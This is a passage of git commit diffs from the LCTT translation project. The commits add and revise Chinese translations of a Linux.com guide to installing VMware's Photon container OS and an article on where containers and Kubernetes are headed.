yourself having trouble with Photon, hop on over to the [Issues tab in the Photon Project’s Github page][27], where you can read and post about issues. And if you’re interested in forking Photon, you’ll find the source code on the project’s [official Github page][28]. - -Give Photon a try and see if it doesn’t make deploying Docker containers and/or Kubernetes clusters significantly easier. - - _Learn more about Linux through the free ["Introduction to Linux" ][29]course from The Linux Foundation and edX._ - --------------------------------------------------------------------------------- - -via: https://www.linux.com/learn/intro-to-linux/2017/11/photon-could-be-your-new-favorite-container-os - -作者:[JACK WALLEN ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.linux.com/users/jlwallen -[1]:https://www.linux.com/licenses/category/used-permission -[2]:https://www.linux.com/licenses/category/used-permission -[3]:https://www.linux.com/licenses/category/used-permission -[4]:https://www.linux.com/licenses/category/used-permission -[5]:https://www.linux.com/licenses/category/creative-commons-zero -[6]:https://kernsec.org/wiki/index.php/Kernel_Self_Protection_Project -[7]:http://vmware.github.io/lightwave/ -[8]:https://www.linux.com/files/images/photon0jpg -[9]:https://www.linux.com/files/images/photon1jpg -[10]:https://www.linux.com/files/images/photon2jpg -[11]:https://www.linux.com/files/images/photon3jpg -[12]:https://www.linux.com/files/images/photon-linuxjpg -[13]:https://www.linux.com/learn/intro-to-linux/2017/11/how-install-and-use-docker-linux -[14]:https://www.docker.com/ -[15]:https://vmware.github.io/photon/ -[16]:https://www.vmware.com/ -[17]:https://www.vmware.com/products/vsphere.html -[18]:https://azure.microsoft.com/ -[19]:https://cloud.google.com/compute/ -[20]:https://aws.amazon.com/ec2/ -[21]:https://www.virtualbox.org/ -[22]:https://github.com/vmware/photon/wiki/Downloading-Photon-OS -[23]:https://github.com/vmware/photon/wiki/Downloading-Photon-OS -[24]:https://github.com/vmware/photon/wiki/Downloading-Photon-OS -[25]:https://github.com/vmware/photon/wiki/Downloading-Photon-OS -[26]:https://github.com/vmware/photon/wiki/Downloading-Photon-OS -[27]:https://github.com/vmware/photon/issues -[28]:https://github.com/vmware/photon -[29]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux diff --git a/translated/tech/20171124 Photon Could Be Your New Favorite Container OS.md b/translated/tech/20171124 Photon Could Be Your New Favorite Container OS.md new file mode 100644 index 0000000000..32d035334d --- /dev/null +++ b/translated/tech/20171124 Photon Could Be Your New Favorite Container OS.md @@ -0,0 +1,147 @@ +Photon也许能成为你最喜爱的容器操作系统 +============================================================ + +![Photon OS](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon-linux.jpg?itok=jUFHPR_c "Photon OS") + +Phonton OS专注于容器,是一个非常出色的平台。 —— Jack Wallen + +容器在当下的火热,并不是没有原因的。正如[之前][13]讨论的,容器可以使您轻松快捷地将新的服务与应用部署到您的网络上,而且并不耗费太多的系统资源。比起专用硬件和虚拟机,容器都是更加划算的,除此之外,他们更容易更新与重用。 + +更重要的是,容器喜欢Linux(反之亦然)。不需要太多时间和麻烦,你就可以启动一台Linux服务器,运行[Docker][14],再是部署容器。但是,哪种Linux发行版最适合部署容器呢?我们的选择很多。你可以使用标准的Ubuntu服务器平台(更容易安装Docker并部署容器)或者是更轻量级的发行版 —— 专门用于部署容器。 + +[Photon][15]就是这样的一个发行版。这个特殊的版本是由[VMware][16]于2005年创建的,它包含了Docker的守护进程,并与容器框架(如Mesos和Kubernetes)一起使用。Photon经过优化可与[VMware vSphere][17]协同工作,而且可用于裸机,[Microsoft Azure][18], [Google Compute Engine][19], [Amazon Elastic Compute Cloud][20], 或者 [VirtualBox][21]等。 + +Photon通过只安装Docker守护进程所必需的东西来保持它的轻量。而这样做的结果是,这个发行版的大小大约只有300MB。但这足以让Linux的运行一切正常。除此之外,Photon的主要特点还有: + +* 内核调整为性能模式。 + +* 内核根据[内核自防护项目][6](KSPP)进行了加固。 + +* 所有安装的软件包都根据加固的安全标志(hardened security flags)来构建。 + +* 操作系统以信任验证(validated trust)启动。 + +* Photon管理进程管理防火墙,网络,软件包,和远程登录在Photon机子上的用户。 + +* 支持持久卷。 + +* [Project Lightwave][7] 整合。 + +* 及时的安全补丁与更新。 + +Photon可以通过[ISO][22],[OVA][23],[Amazon Machine Image][24],[Google Compute Engine image][25]和[Azure VHD][26]安装使用。现在我将向您展示如何使用ISO镜像在VirtualBox上安装Photon。整个安装过程大概需要五分钟,在最后您将有一台随时可以部署容器的虚拟机。 + +### 创建虚拟机 + +在部署第一台容器之前,您必须先创建一台虚拟机并安装Photon。为此,打开VirtualBox并点击“新建”按钮。跟着创建虚拟机向导进行配置(根据您的容器将需要的用途,为Photon提供必要的资源)。在创建好虚拟机后,您所需要做的第一件事就是更改配置。选择新建的虚拟机(在VirtualBox主窗口的左侧面板中),然后单击“设置”。在弹出的窗口中,点击“网络”(在左侧的导航中)。 + +在“网络”窗口(图1)中,你需要在“连接”的下拉窗口中选择桥接。这可以确保您的Photon服务与您的网络相连。完成更改后,单击确定。 + +### [photon_0.jpg][8] + +![change settings](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon_0.jpg?itok=Q0yhOhsZ "change setatings") +图 1: 更改Photon在VirtualBox中的网络设置。[经许可使用][1] + +从左侧的导航选择您的Photon虚拟机,点击启动。系统会提示您去加载IOS镜像。当您完成之后,Photon安装程序将会启动并提示您按回车后开始安装。安装过程基于ncurses(没有GUI),但它非常简单。 + +接下来(图2),系统会询问您是要最小化安装,完整安装还是安装OSTree服务器。我选择了完整安装。选择您所需要的任意选项,然后按回车继续。 + +### [photon_1.jpg][9] + +![installation type](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon_2.jpg?itok=QL1Rs-PH "Photon") +图 2: 选择您的安装类型.[经许可使用][2] + +在下一个窗口,选择您要安装Photon的磁盘。由于我们将其安装在虚拟机,因此只有一块磁盘会被列出(图3)。选择“自动”按下回车。然后安装程序会让您输入(并验证)管理员密码。在这之后镜像开始安装在您的磁盘上并在不到5分钟的时间内结束。 + +### [photon_2.jpg][] + +![Photon](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon_1.jpg?itok=OdnMVpaA "installation type") +图 3: 选择安装Photon的硬盘.[经许可使用][3] + +安装完成后,重启虚拟机并使用安装时创建的用户root和它的密码登录。一切就绪,你准备好开始工作了。 + +在开始使用Docker之前,您需要更新一下Photon。Photon使用 _yum_ 软件包管理器,因此在以root用户登录后输入命令 _yum update_。如果有任何可用更新,则会询问您是否确认(图4)。 + +### [photon_3.jpg][11] + +![Updating](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon_3.jpg?itok=vjqrspE2 "Updating") +图 4: 更新 Photon.[经许可使用][4] + +用法 + +正如我所说的,Photon提供了部署容器甚至创建Kubernetes集群所需要的所有包。但是,在使用之前还要做一些事情。首先要启动Docker守护进程。为此,执行以下命令: + +``` +systemctl start docker + +systemctl enable docker +``` + +现在我们需要创建一个标准用户(standard user),因此我们没有以root去运行docker命令。为此,执行以下命令: + +``` +useradd -m USERNAME + +passwd USERNAME +``` + +其中USERNAME是我们新增的用户的名称。 + +接下来,我们需要将这个新用户添加到 _docker_ 组,执行命令: + +``` +usermod -a -G docker USERNAME +``` + +其中USERNAME是刚刚创建的用户的名称。 + +注销root用户并切换为新增的用户。现在,您已经可以不必使用 _sudo_ 命令或者是切换到root用户来使用 _docker_命令了。从Docker Hub中取出一个镜像开始部署容器吧。 + +### 一个优秀的容器平台 + +在专注于容器方面,Photon毫无疑问是一个出色的平台。请注意,Photon是一个开源项目,因此没有任何付费支持。如果您对Photon有任何的问题,请移步Photon项目的Github下的[Issues][27],那里可以供您阅读相关问题,或者提交您的问题。如果您对Photon感兴趣,您也可以在项目的官方[Github][28]中找到源码。 + +尝试一下Photon吧,看看它是否能够使得Docker容器和Kubernetes集群的部署更加容易。 + +欲了解Linux的更多信息,可以通过学习Linux基金会和edX的免费课程,[“Linux 入门”][29]。 + +-------------------------------------------------------------------------------- + +via: https://www.linux.com/learn/intro-to-linux/2017/11/photon-could-be-your-new-favorite-container-os + +作者:[JACK WALLEN][a] +译者:[KeyLD](https://github.com/KeyLd) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linux.com/users/jlwallen +[1]:https://www.linux.com/licenses/category/used-permission +[2]:https://www.linux.com/licenses/category/used-permission +[3]:https://www.linux.com/licenses/category/used-permission +[4]:https://www.linux.com/licenses/category/used-permission +[5]:https://www.linux.com/licenses/category/creative-commons-zero +[6]:https://kernsec.org/wiki/index.php/Kernel_Self_Protection_Project +[7]:http://vmware.github.io/lightwave/ +[8]:https://www.linux.com/files/images/photon0jpg +[9]:https://www.linux.com/files/images/photon1jpg +[10]:https://www.linux.com/files/images/photon2jpg +[11]:https://www.linux.com/files/images/photon3jpg +[12]:https://www.linux.com/files/images/photon-linuxjpg +[13]:https://www.linux.com/learn/intro-to-linux/2017/11/how-install-and-use-docker-linux +[14]:https://www.docker.com/ +[15]:https://vmware.github.io/photon/ +[16]:https://www.vmware.com/ +[17]:https://www.vmware.com/products/vsphere.html +[18]:https://azure.microsoft.com/ +[19]:https://cloud.google.com/compute/ +[20]:https://aws.amazon.com/ec2/ +[21]:https://www.virtualbox.org/ +[22]:https://github.com/vmware/photon/wiki/Downloading-Photon-OS +[23]:https://github.com/vmware/photon/wiki/Downloading-Photon-OS +[24]:https://github.com/vmware/photon/wiki/Downloading-Photon-OS +[25]:https://github.com/vmware/photon/wiki/Downloading-Photon-OS +[26]:https://github.com/vmware/photon/wiki/Downloading-Photon-OS +[27]:https://github.com/vmware/photon/issues +[28]:https://github.com/vmware/photon +[29]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux From a6371cb0a767a0a84b335291252b19efdc67c1b6 Mon Sep 17 00:00:00 2001 From: nodekey Date: Sat, 2 Dec 2017 20:22:26 +0800 Subject: [PATCH 0129/1627] translated --- ...171124 Photon Could Be Your New Favorite Container OS.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/translated/tech/20171124 Photon Could Be Your New Favorite Container OS.md b/translated/tech/20171124 Photon Could Be Your New Favorite Container OS.md index 32d035334d..e51c580da9 100644 --- a/translated/tech/20171124 Photon Could Be Your New Favorite Container OS.md +++ b/translated/tech/20171124 Photon Could Be Your New Favorite Container OS.md @@ -17,9 +17,9 @@ Photon通过只安装Docker守护进程所必需的东西来保持它的轻量 * 内核根据[内核自防护项目][6](KSPP)进行了加固。 -* 所有安装的软件包都根据加固的安全标志(hardened security flags)来构建。 +* 所有安装的软件包都根据加固的安全标识来构建。 -* 操作系统以信任验证(validated trust)启动。 +* 操作系统在信任验证后启动。 * Photon管理进程管理防火墙,网络,软件包,和远程登录在Photon机子上的用户。 @@ -77,7 +77,7 @@ systemctl start docker systemctl enable docker ``` -现在我们需要创建一个标准用户(standard user),因此我们没有以root去运行docker命令。为此,执行以下命令: +现在我们需要创建一个标准用户,因此我们没有以root去运行docker命令。为此,执行以下命令: ``` useradd -m USERNAME From be4c50e2c7eb8cd25864061c12154fafc401c7d2 Mon Sep 17 00:00:00 2001 From: yunfengHe Date: Sat, 2 Dec 2017 23:35:45 +0800 Subject: [PATCH 0130/1627] translated by yunfengHe --- ...20 Containers and Kubernetes Whats next.md | 38 ++++----- ...20 Containers and Kubernetes Whats next.md | 79 +++++++++++++++++++ 2 files changed, 98 insertions(+), 19 deletions(-) create mode 100644 translated/tech/20171120 Containers and Kubernetes Whats next.md diff --git a/sources/tech/20171120 Containers and Kubernetes Whats next.md b/sources/tech/20171120 Containers and Kubernetes Whats next.md index b73ccb21c2..1a8400d7cd 100644 --- a/sources/tech/20171120 Containers and Kubernetes Whats next.md +++ b/sources/tech/20171120 Containers and Kubernetes Whats next.md @@ -6,16 +6,16 @@ Containers and Kubernetes: What's next? ![CIO_Big Data Decisions_2](https://enterprisersproject.com/sites/default/files/styles/620x350/public/images/CIO_Big%20Data%20Decisions_2.png?itok=Y5zMHxf8 "CIO_Big Data Decisions_2") -If you want a basic idea of where containers are headed in the near future, follow the money. There’s a lot of it: 451 Research projects that the overall market for containers will hit roughly [$2.7 billion in 2020][4], a 3.5-fold increase from the $762 million spent on container-related technology in 2016. +If you want a basic idea of where containers are headed in the near future, follow the money. There’s a lot of it: 451 Research projects that the overall market for containers will hit roughly [$2.7 billion in 2020][4], a 3.5-fold increase from the $762 million spent on container-related technology in 2016. -There’s an obvious fundamental factor behind such big numbers: Rapidly increasing containerization. The parallel trend: As container adoption grows, so will container  _orchestration_  adoption. +There’s an obvious fundamental factor behind such big numbers: Rapidly increasing containerization. The parallel trend: As container adoption grows, so will container _orchestration_ adoption. -As recent survey data from  [_The New Stack_][5]  indicates, container adoption is the most significant catalyst of orchestration adoption: 60 percent of respondents who’ve deployed containers broadly in production report they’re also using Kubernetes widely in production. Another 19 percent of respondents with broad container deployments in production were in the initial stages of broad Kubernetes adoption. Meanwhile, just 5 percent of those in the initial phases of deploying containers in production environments were using Kubernetes broadly – but 58 percent said they were preparing to do so. It’s a chicken-and-egg relationship. +As recent survey data from [_The New Stack_][5] indicates, container adoption is the most significant catalyst of orchestration adoption: 60 percent of respondents who’ve deployed containers broadly in production report they’re also using Kubernetes widely in production. Another 19 percent of respondents with broad container deployments in production were in the initial stages of broad Kubernetes adoption. Meanwhile, just 5 percent of those in the initial phases of deploying containers in production environments were using Kubernetes broadly – but 58 percent said they were preparing to do so. It’s a chicken-and-egg relationship. -Most experts agree that an orchestration tool is essential to the scalable [long-term management of containers][6] – and corresponding developments in the marketplace. “The next trends in container orchestration are all focused on broadening adoption,” says Alex Robinson, software engineer at [Cockroach Labs][7]. +Most experts agree that an orchestration tool is essential to the scalable [long-term management of containers][6] – and corresponding developments in the marketplace. “The next trends in container orchestration are all focused on broadening adoption,” says Alex Robinson, software engineer at [Cockroach Labs][7]. -This is a quickly shifting landscape, one that is just starting to realize its future potential. So we checked in with Robinson and other practitioners to get their boots-on-the-ground perspective on what’s next in container orchestration – and for Kubernetes itself. +This is a quickly shifting landscape, one that is just starting to realize its future potential. So we checked in with Robinson and other practitioners to get their boots-on-the-ground perspective on what’s next in container orchestration – and for Kubernetes itself. ### **Container orchestration shifts to mainstream** @@ -25,40 +25,40 @@ We’re at the precipice common to most major technology shifts, where we transi ### **Reduced complexity** -On a related front, expect an intensifying effort to cut back on the complexity that some organizations face when taking their first plunge into container orchestration. As we’ve covered before, deploying a container might be “easy,” but [managing containers long-term ][8]requires more care. +On a related front, expect an intensifying effort to cut back on the complexity that some organizations face when taking their first plunge into container orchestration. As we’ve covered before, deploying a container might be “easy,” but [managing containers long-term ][8]requires more care. -“Today, container orchestration is too complex for many users to take full advantage,” says My Karlsson, developer at [Codemill AB][9]. “New users are often struggling just to get single or small-size container configurations running in isolation, especially when applications are not originally designed for it. There are plenty of opportunities to simplify the orchestration of non-trivial applications and make the technology more accessible.” +“Today, container orchestration is too complex for many users to take full advantage,” says My Karlsson, developer at [Codemill AB][9]. “New users are often struggling just to get single or small-size container configurations running in isolation, especially when applications are not originally designed for it. There are plenty of opportunities to simplify the orchestration of non-trivial applications and make the technology more accessible.” ### **Increasing focus on hybrid cloud and multi-cloud** -As adoption of containers and container orchestration grows, more organizations will scale from a starting point of, say, running non-critical workloads in a single environment to more [complex use cases][10] across multiple environments. For many companies, that will mean managing containerized applications (and particularly containerized microservices) across [hybrid cloud][11] and [multi-cloud][12] environments, often globally. +As adoption of containers and container orchestration grows, more organizations will scale from a starting point of, say, running non-critical workloads in a single environment to more [complex use cases][10] across multiple environments. For many companies, that will mean managing containerized applications (and particularly containerized microservices) across [hybrid cloud][11] and [multi-cloud][12] environments, often globally. -"Containers and Kubernetes have made hybrid cloud and application portability a reality,” says [Brian Gracely][13], director of [Red Hat][14] OpenShift product strategy. “Combined with the Open Service Broker, we expect to see an explosion of new applications that combine private and public cloud resources." +"Containers and Kubernetes have made hybrid cloud and application portability a reality,” says [Brian Gracely][13], director of [Red Hat][14] OpenShift product strategy. “Combined with the Open Service Broker, we expect to see an explosion of new applications that combine private and public cloud resources." -“I believe that federation will get a push, enabling much-wanted features such as seamless multi-region and multi-cloud deployments,” says Carlos Sanchez, senior software engineer at [CloudBees][15].  +“I believe that federation will get a push, enabling much-wanted features such as seamless multi-region and multi-cloud deployments,” says Carlos Sanchez, senior software engineer at [CloudBees][15]. -**[ Want CIO wisdom on hybrid cloud and multi-cloud strategy? See our related resource, **[**Hybrid Cloud: The IT leader's guide**][16]**. ]** +**[ Want CIO wisdom on hybrid cloud and multi-cloud strategy? See our related resource, **[**Hybrid Cloud: The IT leader's guide**][16]**. ]** ### **Continued consolidation of platforms and tools** Technology consolidation is common trend; container orchestration is no exception. -“As containerization goes mainstream, engineers are consolidating on a very small number of technologies to run their [microservices and] containers and Kubernetes will become the dominant container orchestration platform, far outstripping other platforms,” says Ben Newton, analytics lead at [Sumo Logic][17]. “Companies will adopt Kubernetes to drive a cloud-neutral approach as Kubernetes provides a reasonably clear path to reduce dependence on [specific] cloud ecosystems.**”** +“As containerization goes mainstream, engineers are consolidating on a very small number of technologies to run their [microservices and] containers and Kubernetes will become the dominant container orchestration platform, far outstripping other platforms,” says Ben Newton, analytics lead at [Sumo Logic][17]. “Companies will adopt Kubernetes to drive a cloud-neutral approach as Kubernetes provides a reasonably clear path to reduce dependence on [specific] cloud ecosystems.**”** ### **Speaking of Kubernetes, what’s next?** -"Kubernetes is here for the long haul, and the community driving it is doing great job – but there's lots ahead,” says Gadi Naor, CTO and co-founder of [Alcide][18]. Our experts shared several predictions specific to [the increasingly popular Kubernetes platform][19]:  +"Kubernetes is here for the long haul, and the community driving it is doing great job – but there's lots ahead,” says Gadi Naor, CTO and co-founder of [Alcide][18]. Our experts shared several predictions specific to [the increasingly popular Kubernetes platform][19]: - **_Gadi Naor at Alcide:_**  “Operators will continue to evolve and mature, to a point where applications running on Kubernetes will become fully self-managed. Deploying and monitoring microservices on top of Kubernetes with [OpenTracing][20] and service mesh frameworks such as [istio][21] will help shape new possibilities.” + **_Gadi Naor at Alcide:_** “Operators will continue to evolve and mature, to a point where applications running on Kubernetes will become fully self-managed. Deploying and monitoring microservices on top of Kubernetes with [OpenTracing][20] and service mesh frameworks such as [istio][21] will help shape new possibilities.” - **_Brian Gracely at Red Hat:_**  “Kubernetes continues to expand in terms of the types of applications it can support. When you can run traditional applications, cloud-native applications, big data applications, and HPC or GPU-centric applications on the same platform, it unlocks a ton of architectural flexibility.” + **_Brian Gracely at Red Hat:_** “Kubernetes continues to expand in terms of the types of applications it can support. When you can run traditional applications, cloud-native applications, big data applications, and HPC or GPU-centric applications on the same platform, it unlocks a ton of architectural flexibility.” - **_Ben Newton at Sumo Logic: _ “**As Kubernetes becomes more dominant, I would expect to see more normalization of the operational mechanisms – particularly integrations into third-party management and monitoring platforms.” + **_Ben Newton at Sumo Logic: _ “**As Kubernetes becomes more dominant, I would expect to see more normalization of the operational mechanisms – particularly integrations into third-party management and monitoring platforms.” - **_Carlos Sanchez at CloudBees: _** “In the immediate future there is the ability to run without Docker, using other runtimes...to remove any lock-in. [Editor’s note: [CRI-O][22], for example, offers this ability.] “Also, [look for] storage improvements to support enterprise features like data snapshotting and online volume resizing.” + **_Carlos Sanchez at CloudBees: _** “In the immediate future there is the ability to run without Docker, using other runtimes...to remove any lock-in. [Editor’s note: [CRI-O][22], for example, offers this ability.] “Also, [look for] storage improvements to support enterprise features like data snapshotting and online volume resizing.” - **_Alex Robinson at Cockroach Labs: _ “**One of the bigger developments happening in the Kubernetes community right now is the increased focus on managing [stateful applications][23]. Managing state in Kubernetes right now is very difficult if you aren't running in a cloud that offers remote persistent disks, but there's work being done on multiple fronts [both inside Kubernetes and by external vendors] to improve this.” + **_Alex Robinson at Cockroach Labs: _ “**One of the bigger developments happening in the Kubernetes community right now is the increased focus on managing [stateful applications][23]. Managing state in Kubernetes right now is very difficult if you aren't running in a cloud that offers remote persistent disks, but there's work being done on multiple fronts [both inside Kubernetes and by external vendors] to improve this.” -------------------------------------------------------------------------------- @@ -95,4 +95,4 @@ via: https://enterprisersproject.com/article/2017/11/containers-and-kubernetes-w [22]:http://cri-o.io/ [23]:https://opensource.com/article/17/2/stateful-applications [24]:https://enterprisersproject.com/article/2017/11/containers-and-kubernetes-whats-next?rate=PBQHhF4zPRHcq2KybE1bQgMkS2bzmNzcW2RXSVItmw8 -[25]:https://enterprisersproject.com/user/kevin-casey +[25]:https://enterprisersproject.com/user/kevin-casey \ No newline at end of file diff --git a/translated/tech/20171120 Containers and Kubernetes Whats next.md b/translated/tech/20171120 Containers and Kubernetes Whats next.md new file mode 100644 index 0000000000..a6e7b8f7e6 --- /dev/null +++ b/translated/tech/20171120 Containers and Kubernetes Whats next.md @@ -0,0 +1,79 @@ +容器技术和 k8s 的下一站: +============================================================ +### 想知道容器编排管理和 K8s 的最新展望么?来看看专家怎么说。 + +![CIO_Big Data Decisions_2](https://enterprisersproject.com/sites/default/files/styles/620x350/public/images/CIO_Big%20Data%20Decisions_2.png?itok=Y5zMHxf8 "CIO_Big Data Decisions_2") + +如果你想对容器在未来的发展方向有一个整体把握,那么你一定要跟着钱走,看看钱都投在了哪里。当然了,有很多很多的钱正在投入容器的进一步发展。相关研究预计 2020 年容器技术的投入将占有 [27 亿美元][4] 的市场份额 。而在 2016 年,容器相关技术投入的总额为 7.62 亿美元,只有 2020 年投入预计的三分之一。巨额投入的背后是一些显而易见的基本因素,包括容器化的迅速增长以及并行化的大趋势。随着容器被大面积推广和使用,容器编排管理也会被理所当然的推广应用起来。 + +来自 [_The new stack_][5] 的调研数据表明,容器的推广使用是编排管理被推广的主要的催化剂。根据调研参与者的反馈数据,在已经将容器技术使用到生产环境中的使用者里,有六成正在将 kubernetes(k8s)编排管理广泛的应用在生产环境中,另外百分之十九的人员则表示他们已经处于部署 k8s 的初级阶段。在容器部署初期的使用者当中,虽然只有百分之五的人员表示已经在使用 K8s ,但是百分之五十八的人员表示他们正在计划和准备使用 K8s。总而言之,容器和 Kuebernetes 的关系就好比是鸡和蛋一样,相辅相成紧密关联。众多专家一致认为编排管理工具对容器的[长周期管理][6] 以及其在市场中的发展有至关重要的作用。正如 [Cockroach 实验室][7] 的 Alex Robinson 所说,容器编排管理被更广泛的拓展和应用是一个总体的大趋势。毫无疑问,这是一个正在快速演变的领域,且未来潜力无穷。鉴于此,我们对罗宾逊和其他的一些容器的实际使用和推介者做了采访,来从他们作为容器技术的践行者的视角上展望一下容器编排以及 k8s 的下一步发展。 + +### **容器编排将被主流接受*** + +像任何重要技术的转型一样,我们就像是处在一个高崖之上一般,在经过了初期步履蹒跚的跋涉之后将要来到一望无际的广袤平原。广大的新天地和平实真切的应用需求将会让这种新技术在主流应用中被迅速推广,尤其是在大企业环境中。正如 Alex Robinson 说的那样,容器技术的淘金阶段已经过去,早期的技术革新创新正在减速,随之而来的则是市场对容器技术的稳定性和可用性的强烈需求。这意味着未来我们将不会再见到大量的新的编排管理系统的涌现,而是会看到容器技术方面更多的安全解决方案,更丰富的管理工具,以及基于目前主流容器编排系统的更多的新特性。 + +### **更好的易用性** + +人们将在简化容器的部署方面下大功夫,因为容器部署的初期工作对很多公司和组织来说还是比较复杂的,尤其是容器的[长期管理维护][8]更是需要投入大量的精力。正如 [Codemill AB][9] 公司的 My Karlsson 所说,容器编排技术还是太复杂了,这导致很多使用者难以娴熟驾驭和充分利用容器编排的功能。很多容器技术的新用户都需要花费很多精力,走很多弯路,才能搭建小规模的,单个的,被隔离的容器系统。这种现象在那些没有针对容器技术设计和优化的应用中更为明显。在简化容器编排管理方面有很多优化可以做,这些优化和改造将会使容器技术更加具有可用性。 + +### **在 hybrid cloud 以及 multi-cloud 技术方面会有更多侧重*** + +随着容器和容器编排技术被越来越多的使用,更多的组织机构会选择扩展他们现有的容器技术的部署,从之前的把非重要系统部署在单一环境的使用情景逐渐过渡到更加[复杂的使用情景][10]。对很多公司来说,这意味着他们必须开始学会在 [hybrid cloud][11] 和 [muilti-cloud][12] 的环境下,全局化的去管理那些容器化的应用和微服务。正如红帽 [Openshift 部门产品战略总监][14] [Brian Gracely][13] 所说,容器和 k8s 技术的使用使得我们成功的实现了混合云以及应用的可移植性。结合 Open Service Broker API 的使用,越来越多的结合私有云和公有云资源的新应用将会涌现出来。 +据 [CloudBees][15] 公司的高级工程师 Carlos Sanchez 分析,联合服务(Federation)将会得到极大推动,使一些诸如多地区部署和多云部署等的备受期待的新特性成为可能。 + +**[ 想知道 CIO 们对 hybrid cloud 和 multi cloud 的战略构想么? 请参看我们的这条相关资源, **[**Hybrid Cloud: The IT leader's guide**][16]**. ]** + +### **平台和工具的持续整合及加强** + +对任何一种科技来说,持续的整合和加强从来都是大势所趋; 容器编排管理技术在这方面也不例外。来自 [Sumo Logic][17] 的首席分析师 Ben Newton 表示,随着容器化渐成主流,软件工程师们正在很少数的一些技术上做持续整合加固的工作,来满足他们的一些微应用的需求。容器和 K8s 将会毫无疑问的成为容器编排管理方面的主流平台,并轻松碾压其他的一些小众平台方案。因为 K8s 提供了一个相当清晰的可以摆脱各种特有云生态的途径,K8s 将被大量公司使用,逐渐形成一个不依赖于某个特定云服务的“中立云”(cloud-neutral)。 + +### ** K8s 的下一站** + +来自 [Alcide][18] 的 CTO 和联合创始人 Gadi Naor 表示,k8s 将会是一个有长期和远景发展的技术,虽然我们的社区正在大力推广和发展 k8s,k8s 仍有很长的路要走。 +专家们对[日益流行的 k8s 平台][19]也作出了以下一些预测: + +**_来自 Alcide 的 Gadi Naor 表示:_** “运营商会持续演进并趋于成熟,直到在 k8s 上运行的应用可以完全自治。利用 [OpenTracing][20] 和诸如 [istio][21] 技术的 service mesh 架构,在 k8s 上部署和监控微应用将会带来很多新的可能性。” + +**_来自 Red Hat 的 Brian Gracely 表示:_** “k8s 所支持的应用的种类越来越多。今后在 k8s 上,你不仅可以运行传统的应用程序,还可以运行原生的云应用,大数据应用以及 HPC 或者基于 GPU 运算的应用程序,这将为灵活的架构设计带来无限可能。” + +**_来自 Sumo Logic 的 Ben Newton 表示:_** “随着 k8s 成为一个具有统治地位的平台,我预计更多的操作机制将会被统一化,尤其是 k8s 将和第三方管理和监控平台融合起来。” + +**_来自 CloudBees 的 Carlos Sanchez 表示:_** ”在不久的将来我们就能看到不依赖于 Docker 而使用其他运行时环境的系统,这将会有助于消除任何可能的 lock-in 情景“ [小编提示:[CRI-O][22] 就是一个可以借鉴的例子。]“而且我期待将来会出现更多的针对企业环境的存储服务新特性,包括数据快照以及在线的磁盘容量的扩展。” + +**_来自小强实验室(Cockroach Labs)的 Alex Robinson 表示:_** “k8s 社区正在讨论的一个重大发展议题就是加强对[有状态程序][23]的管理。目前在 k8s 平台下,实现状态管理仍然非常困难,除非你所使用的云服务商可以提供远程固定磁盘。现阶段也有很多人在多方面试图改善这个状况,包括在 k8s 平台内部以及在外部服务商一端做出的一些改进。” +------------------------------------------------------------------------------- + +via: https://enterprisersproject.com/article/2017/11/containers-and-kubernetes-whats-next + +作者:[Kevin Casey ][a] +译者:[yunfengHe](https://github.com/yunfengHe) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://enterprisersproject.com/user/kevin-casey +[1]:https://enterprisersproject.com/article/2017/11/kubernetes-numbers-10-compelling-stats +[2]:https://enterprisersproject.com/article/2017/11/how-enterprise-it-uses-kubernetes-tame-container-complexity +[3]:https://enterprisersproject.com/article/2017/11/5-kubernetes-success-tips-start-smart?sc_cid=70160000000h0aXAAQ +[4]:https://451research.com/images/Marketing/press_releases/Application-container-market-will-reach-2-7bn-in-2020_final_graphic.pdf +[5]:https://thenewstack.io/ +[6]:https://enterprisersproject.com/article/2017/10/microservices-and-containers-6-management-tips-long-haul +[7]:https://www.cockroachlabs.com/ +[8]:https://enterprisersproject.com/article/2017/10/microservices-and-containers-6-management-tips-long-haul +[9]:https://codemill.se/ +[10]:https://www.redhat.com/en/challenges/integration?intcmp=701f2000000tjyaAAA +[11]:https://enterprisersproject.com/hybrid-cloud +[12]:https://enterprisersproject.com/article/2017/7/multi-cloud-vs-hybrid-cloud-whats-difference +[13]:https://enterprisersproject.com/user/brian-gracely +[14]:https://www.redhat.com/en +[15]:https://www.cloudbees.com/ +[16]:https://enterprisersproject.com/hybrid-cloud?sc_cid=70160000000h0aXAAQ +[17]:https://www.sumologic.com/ +[18]:http://alcide.io/ +[19]:https://enterprisersproject.com/article/2017/10/how-explain-kubernetes-plain-english +[20]:http://opentracing.io/ +[21]:https://istio.io/ +[22]:http://cri-o.io/ +[23]:https://opensource.com/article/17/2/stateful-applications +[24]:https://enterprisersproject.com/article/2017/11/containers-and-kubernetes-whats-next?rate=PBQHhF4zPRHcq2KybE1bQgMkS2bzmNzcW2RXSVItmw8 +[25]:https://enterprisersproject.com/user/kevin-casey From 3e1a2beb329d2f4810e84366a121dfda5f6b133a Mon Sep 17 00:00:00 2001 From: yunfengHe Date: Sat, 2 Dec 2017 23:39:51 +0800 Subject: [PATCH 0131/1627] translated, modified --- .../tech/20171120 Containers and Kubernetes Whats next.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/translated/tech/20171120 Containers and Kubernetes Whats next.md b/translated/tech/20171120 Containers and Kubernetes Whats next.md index a6e7b8f7e6..62a81dc9fa 100644 --- a/translated/tech/20171120 Containers and Kubernetes Whats next.md +++ b/translated/tech/20171120 Containers and Kubernetes Whats next.md @@ -40,7 +40,7 @@ **_来自 CloudBees 的 Carlos 